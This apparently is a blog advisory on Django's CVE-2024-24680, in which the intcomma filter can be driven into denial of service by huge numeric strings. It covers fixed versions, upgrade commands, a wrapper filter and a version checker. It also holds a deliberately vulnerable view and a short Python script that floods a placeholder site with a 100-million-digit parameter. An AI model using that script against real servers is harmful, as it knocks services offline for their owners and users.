CVE-2024-24680 - Django `intcomma` Filter Vulnerability Could Lead To Denial-of-Service (DoS) In Your App
If your website or web service is powered by Django and you like to display numbers in a more human-friendly way with commas (like 1,000,000), you may run into a hidden danger. A recent security issue, assigned CVE-2024-24680, affects the commonly used intcomma template filter in Django. If left unpatched, it could allow anyone―even an unregistered visitor―to take down your Django app using a simple crafted string.
Let's break down what happened, see how it can be exploited, and how you can fix or work around this issue right now.
- Fixed in: Django 3.2.24, 4.2.10 and 5.0.2
- Reference: Django Security Advisory
- CVE: CVE-2024-24680
What Is intcomma And Why Is It Risky?
The intcomma filter is a Django template tool that formats numbers with proper comma separators. Example:
{{ 1234567|intcomma }}
outputs
1,234,567
But the bug in affected versions happens when you pass very long strings to this filter. The intcomma implementation was not prepared to handle these huge inputs efficiently. If someone intentionally feeds your site a massive (for example, hundreds of megabytes long) string, the filter will try to process and format it, eating up a ton of memory and CPU.
That can quickly bring down your website ― this is a classic denial-of-service (DoS).
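To see why a formatting helper can melt down on long input, here is an added illustration that is not Django's code and not from the original post: a grouping routine that inserts one comma per pass and re-scans the whole string each time, next to a single-pass version. Both produce identical output, but the pass-per-comma approach does work proportional to the square of the digit count, which is the failure class this CVE belongs to. The function names and the constructed sample inputs are mine.

```python
import re
import time

# Matches a run of digits at the start of the string that is followed by three
# more digits; one substitution inserts exactly one comma from the right.
_GROUP_RE = re.compile(r"^(-?\d+)(\d{3})")


def repeated_pass_intcomma(value):
    """Insert one comma per pass until nothing changes.

    Returns (formatted, passes). Every pass re-scans the whole string, so a
    string of n digits needs about n/3 passes of O(n) work each: O(n^2) total.
    Illustration of the failure class only, not Django's implementation.
    """
    text = str(value)
    passes = 0
    while True:
        passes += 1
        updated = _GROUP_RE.sub(r"\g<1>,\g<2>", text)
        if updated == text:
            return text, passes
        text = updated


def single_pass_intcomma(value):
    """Group digits in one left-to-right pass; O(n) for n digits.

    Only plain integer strings (optional leading '-') are grouped; anything
    else is returned unchanged so the caller can decide how to handle it.
    """
    text = str(value)
    sign = ""
    if text.startswith("-"):
        sign, text = "-", text[1:]
    if not text.isdigit():
        return sign + text
    head = len(text) % 3 or 3          # length of the leading (short) group
    groups = [text[:head]]
    groups.extend(text[i:i + 3] for i in range(head, len(text), 3))
    return sign + ",".join(groups)


def time_both(digit_count):
    """Format a constructed string of `digit_count` nines with both routines
    and return (seconds_repeated, seconds_single) for comparison."""
    sample = "9" * digit_count             # constructed input, not real data
    start = time.perf_counter()
    repeated_pass_intcomma(sample)
    mid = time.perf_counter()
    single_pass_intcomma(sample)
    end = time.perf_counter()
    return mid - start, end - mid


if __name__ == "__main__":
    # Doubling the input roughly quadruples the repeated-pass time while the
    # single-pass time grows linearly; exact figures depend on the host.
    for n in (2_000, 4_000, 8_000, 16_000):
        slow, fast = time_both(n)
        print(f"{n:>6} digits: repeated-pass {slow:.4f}s  single-pass {fast:.6f}s")
```

One caveat when writing the linear version: converting the string with int() and then using format(value, ",") is not a shortcut for arbitrary input, because since Python 3.11 int() on a string longer than 4300 digits raises ValueError by default (see sys.set_int_max_str_digits), itself a guard against a similar conversion-cost problem.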
Suppose you have a Django template like this:
<p>{{ value|intcomma }}</p>
If value comes directly from user input (for example, via a form or query parameter), an attacker could POST or GET a value made up of millions of digits, for example:
111111... (repeated several million times)
When the template renders, intcomma tries to format this gigantic string, causing server resources to spike.
Here’s a minimal view to demonstrate the risk:
# views.py
from django.shortcuts import render
from django.http import HttpRequest

def risky_view(request: HttpRequest):
    # The untrusted query parameter is passed straight to the template
    value = request.GET.get('amount', '')
    return render(request, "show_amount.html", {"value": value})
And your template (intcomma lives in django.contrib.humanize, so the template has to load it):
<!-- templates/show_amount.html -->
{% load humanize %}
{{ value|intcomma }}
Now, visit:
/yourpage/?amount=1<very,very,long_number_here>
That single request can bring your backend to its knees!
Here’s a quick Python script to test the DoS exploit against a vulnerable Django site:
import requests

long_number = '9' * 100_000_000  # 100 million digits
payload = {'amount': long_number}
url = 'https://victim-site.example.com/risky-page/'
response = requests.get(url, params=payload, timeout=10)
print("Status Code:", response.status_code)
This can cause your server to hang or run out of memory, especially if several requests are made at once.
How To Fix It
Upgrade Django to a patched release. Run one of:
pip install --upgrade "django>=3.2.24,<3.3"
# or
pip install --upgrade "django>=4.2.10,<4.3"
# or
pip install --upgrade "django>=5.0.2,<5.1"
See official security notes:
- Django 3.2.24 Release Notes
- Django 4.2.10 Release Notes
- Django 5.0.2 Release Notes
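A quick way to check a deployment against the three fixed releases listed above. This is an added helper, not part of the original post and not Django's own code; FIXED_RELEASES is taken from the versions on this page, and the function names are mine.

```python
import re

# Minimum patched release per supported Django series, as listed in the
# advisory and release notes above (3.2.24, 4.2.10, 5.0.2).
FIXED_RELEASES = {
    (3, 2): (3, 2, 24),
    (4, 2): (4, 2, 10),
    (5, 0): (5, 0, 2),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(version):
    """Turn '4.2.10' or '5.0.2' into (4, 2, 10); pre-release suffixes such as
    '5.1a1' are truncated to their numeric prefix. Raises ValueError if the
    string does not start with MAJOR.MINOR."""
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised Django version: {version!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def is_patched(version):
    """Return True if this Django version includes the CVE-2024-24680 fix.

    Series listed in FIXED_RELEASES are patched from the listed release on.
    Anything newer than the newest fixed series (5.1 and later) was released
    after the fix and carries it. Older series that were already out of
    support when the advisory was published (for example 4.0.x and 4.1.x)
    never received a fix release, so they are reported as unpatched.
    """
    parsed = parse_version(version)
    series = parsed[:2]
    if series in FIXED_RELEASES:
        return parsed >= FIXED_RELEASES[series]
    newest_fixed_series = max(FIXED_RELEASES)
    return series > newest_fixed_series


def check_installed():
    """Report on the Django actually importable in this environment.
    Returns (version_string, patched) or (None, None) if Django is absent."""
    try:
        import django
    except ImportError:
        return None, None
    version = django.get_version()
    return version, is_patched(version)


if __name__ == "__main__":
    version, patched = check_installed()
    if version is None:
        print("Django is not installed in this interpreter")
    else:
        state = "patched" if patched else "VULNERABLE - upgrade"
        print(f"Django {version}: {state} for CVE-2024-24680")
```

Run it inside the virtualenv that serves the site; checking a different interpreter tells you nothing about what the WSGI/ASGI process actually imports.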
Workaround: if you can’t upgrade right away, wrap intcomma in a filter that refuses oversized input before the real formatter ever sees it. Example:
from django import template
from django.contrib.humanize.templatetags.humanize import intcomma

register = template.Library()

MAX_DIGITS = 50  # anything longer than this is not a number worth formatting

@register.filter
def safe_intcomma(value):
    value_str = str(value)
    if len(value_str) > MAX_DIGITS:
        return value  # Or some warning/error string
    # Delegate to Django's own intcomma only for inputs of sane size
    return intcomma(value_str)
Final Thoughts
Vulnerabilities like CVE-2024-24680 remind us it’s not just fancy features, but tiny helpers like intcomma that attackers can twist to break your app. Applying security updates is the only real fix. While this might sound like a corner case, public sites and APIs are constant targets.
Official announcement:
Django Security Advisory - CVE-2024-24680
Patch Details on GitHub:
NVD entry:
CVE-2024-24680
Stay updated, stay safe!
If you found this helpful, consider sharing with friends and colleagues who use Django.
Timeline
Published on: 02/06/2024 22:16:15 UTC
Last modified on: 04/20/2024 03:15:06 UTC